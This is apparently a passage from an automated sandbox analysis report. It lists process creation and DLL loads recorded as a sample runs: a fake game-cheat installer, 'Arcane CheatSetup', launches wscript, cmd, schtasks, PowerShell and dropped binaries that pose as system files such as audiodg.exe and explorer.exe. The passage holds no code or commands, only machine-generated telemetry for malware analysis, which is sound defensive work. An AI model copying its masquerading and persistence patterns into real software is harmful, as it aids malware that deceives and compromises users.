            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: version.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: slc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: mscoree.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: apphelp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: version.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: wldp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: profapi.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptsp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: rsaenh.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: sspicli.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: mscoree.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: version.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: wldp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: profapi.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptsp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: rsaenh.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: sspicli.dll
            Source: C:\Recovery\explorer.exeSection loaded: mscoree.dll
            Source: C:\Recovery\explorer.exeSection loaded: apphelp.dll
            Source: C:\Recovery\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\explorer.exeSection loaded: version.dll
            Source: C:\Recovery\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\explorer.exeSection loaded: wldp.dll
            Source: C:\Recovery\explorer.exeSection loaded: profapi.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
